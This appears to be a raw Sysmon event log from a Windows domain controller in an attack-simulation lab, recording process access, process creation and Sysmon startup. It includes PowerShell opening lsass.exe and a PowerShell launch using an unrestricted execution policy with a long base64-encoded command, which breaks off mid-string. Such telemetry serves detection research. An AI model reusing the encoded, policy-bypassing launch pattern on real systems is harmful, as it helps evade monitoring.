13:52:21.634{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BF02-000000009001}2964C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000008Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:21.645{10ACEC4A-8515-5FCF-BF02-000000009001}2964C:\Windows\System32\wbem\unsecapp.exe10.0.14393.2515 (rs1_release_1.180830-1044)Sink to receive asynchronous callbacks for WMI client applicationMicrosoft® Windows® Operating SystemMicrosoft Corporationunsecapp.dllC:\Windows\system32\wbem\unsecapp.exe -EmbeddingC:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-83B6-5FCF-E703-000000000000}0x3e70SystemMD5=2E49BB6C9F6599F518FE30BE2F000247,SHA256=20F499D581CF4AF331D8EC8B1E07A32CC1A695EF6790B51DA5EE223C5867154F,IMPHASH=A3CC49DF67C2278F822C9EBB9908BF09{10ACEC4A-83B9-5FCF-0C00-000000009001}480C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x80000000000000007Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:21.618{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:21.618{10ACEC4A-83B6-5FCF-0A00-000000009001}852956C:\Windows\system32\services.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:21.618{10ACEC4A-83AA-5FCF-0500-000000009001}640760C:\Windows\system32\csrss.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:21.602{10ACEC4A-83B6-5FCF-0A00-000000009001}8521140C:\Windows\system32\services.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\services.exe+12bee|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d608|C:\Windows\system32\services.exe+4c6c|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:21.594{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe12.03System activity monitorSysinternals SysmonSysinternals - www.sysinternals.com-C:\Windows\sysmon64.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-83B6-5FCF-E703-000000000000}0x3e70SystemMD5=395EDC237F5BCD8DBA6F03289ED0AC58,SHA256=C22826DEAAF0B90359378807E37F6F984842EB41D6DDEFE09CCD243E54A24779,IMPHASH=49AAA307415968B34D3FD1A72DEE6C71{10ACEC4A-83B6-5FCF-0A00-000000009001}852C:\Windows\System32\services.exeC:\Windows\system32\services.exe 434400x80000000000000002Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local2020-12-08 13:52:21.696Started12.034.40 16341600x80000000000000001Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local2020-12-08 13:52:21.571c:\Program Files\ansible\AttackRangeSysmon.xmlSHA1=6E783FACE677BFADD35F945335AE39F83110F21B 10341000x800000000000000095Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:22.962{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-8516-5FCF-C302-000000009001}4760C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000094Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:22.946{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-8516-5FCF-C302-000000009001}4760C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x800000000000000093Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:22.915{10ACEC4A-8516-5FCF-C302-000000009001}4760C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_wjbsma0t.etg.ps12020-12-08 13:52:22.915 10341000x800000000000000092Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:22.899{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8516-5FCF-C302-000000009001}4760C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000091Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:22.884{10ACEC4A-8516-5FCF-C102-000000009001}42764564C:\Windows\system32\conhost.exe{10ACEC4A-8516-5FCF-C302-000000009001}4760C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000090Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:22.884{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000089Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:22.884{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000088Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:22.884{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000087Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:22.884{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000086Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:22.884{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000085Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:22.884{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000084Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:22.884{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000083Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:22.884{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000082Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:22.884{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000081Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:22.884{10ACEC4A-83AA-5FCF-0500-000000009001}640656C:\Windows\system32\csrss.exe{10ACEC4A-8516-5FCF-C302-000000009001}4760C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000080Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:22.884{10ACEC4A-8516-5FCF-C202-000000009001}31843936C:\Windows\system32\cmd.exe{10ACEC4A-8516-5FCF-C302-000000009001}4760C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000079Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:22.876{10ACEC4A-8516-5FCF-C302-000000009001}4760C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBhAFEAQgBtAEEAQwBBAEEASwBBAEEAawBBAEYAQQBBAFUAdwBCAFcAQQBHAFUAQQBjAGcAQgB6AEEARwBrAEEAYgB3AEIAdQBBAEYAUQBBAFkAUQBCAGkAQQBHAHcAQQBaAFEAQQB1AEEARgBBAEEAVQB3AEIAVwBBAEcAVQBBAGMAZwBCAHoAQQBHAGsAQQBiAHcAQgB1AEEAQwBBAEEATABRAEIAcwBBAEgAUQBBAEkAQQBCAGIAQQBGAFkAQQBaAFEAQgB5AEEASABNAEEAYQBRAEIAdgBBAEcANABBAFgAUQBBAGkAQQBEAE0AQQBMAGcAQQB3AEEAQwBJAEEASwBRAEEAZwBBAEgAcwBBAEMAZwBBAG4AQQBIAHMAQQBJAGcAQgBtAEEARwBFAEEAYQBRAEIAcwBBAEcAVQBBAFoAQQBBAGkAQQBEAG8AQQBkAEEAQgB5AEEASABVAEEAWgBRAEEAcwBBAEMASQBBAGIAUQBCAHoAQQBHAGMAQQBJAGcAQQA2AEEAQwBJAEEAUQBRAEIAdQBBAEgATQBBAGEAUQBCAGkAQQBHAHcAQQBaAFEAQQBnAEEASABJAEEAWgBRAEIAeABBAEgAVQBBAGEAUQBCAHkAQQBHAFUAQQBjAHcAQQBnAEEARgBBAEEAYgB3AEIAMwBBAEcAVQBBAGMAZwBCAFQAQQBHAGcAQQBaAFEAQgBzAEEARwB3AEEASQBBAEIAMgBBAEQATQBBAEwAZwBBAHcAQQBDAEEAQQBiAHcAQgB5AEEAQwBBAEEAYgBnAEIAbABBAEgAYwBBAFoAUQBCAHkAQQBDAEkAQQBmAFEAQQBuAEEAQQBvAEEAWgBRAEIANABBAEcAawBBAGQAQQBBAGcAQQBEAEUAQQBDAGcAQgA5AEEAQQBvAEEASgBBAEIAbABBAEgAZwBBAFoAUQBCAGoAQQBGADgAQQBkAHcAQgB5AEEARwBFAEEAYwBBAEIAdwBBAEcAVQBBAGMAZwBCAGYAQQBIAE0AQQBkAEEAQgB5AEEAQwBBAEEAUABRAEEAZwBBAEMAUQBBAGEAUQBCAHUAQQBIAEEAQQBkAFEAQgAwAEEAQwBBAEEAZgBBAEEAZwBBAEUAOABBAGQAUQBCADAAQQBDADAAQQBVAHcAQgAwAEEASABJAEEAYQBRAEIAdQBBAEcAYwBBAEMAZwBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQQBnAEEARAAwAEEASQBBAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBGADgAQQBjAHcAQgAwAEEASABJAEEATABnAEIAVABBAEgAQQBBAGIAQQBCAHAAQQBIAFEAQQBLAEEAQgBBAEEAQwBnAEEASQBnAEIAZwBBAEQAQQBBAFkAQQBBAHcAQQBHAEEAQQBNAEEAQgBnAEEARABBAEEASQBnAEEAcABBAEMAdwBBAEkAQQBBAHkAQQBDAHcAQQBJAEEAQgBiAEEARgBNAEEAZABBAEIAeQBBAEcAawBBAGIAZwBCAG4AQQBGAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAUABBAEgAQQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQgB6AEEARgAwAEEATwBnAEEANgBBAEYASQBBAFoAUQBCAHQAQQBHADgAQQBkAGcAQgBsAEEARQBVAEEAYgBRAEIAdwBBAEgAUQBBAGUAUQBCAEYAQQBHADQAQQBkAEEAQgB5AEEARwBrAEEAWgBRAEIAegBBAEMAawBBAEMAZwBCAEoAQQBHAFkAQQBJAEEAQQBvAEEAQwAwAEEAYgBnAEIAdgBBAEgAUQBBAEkAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZA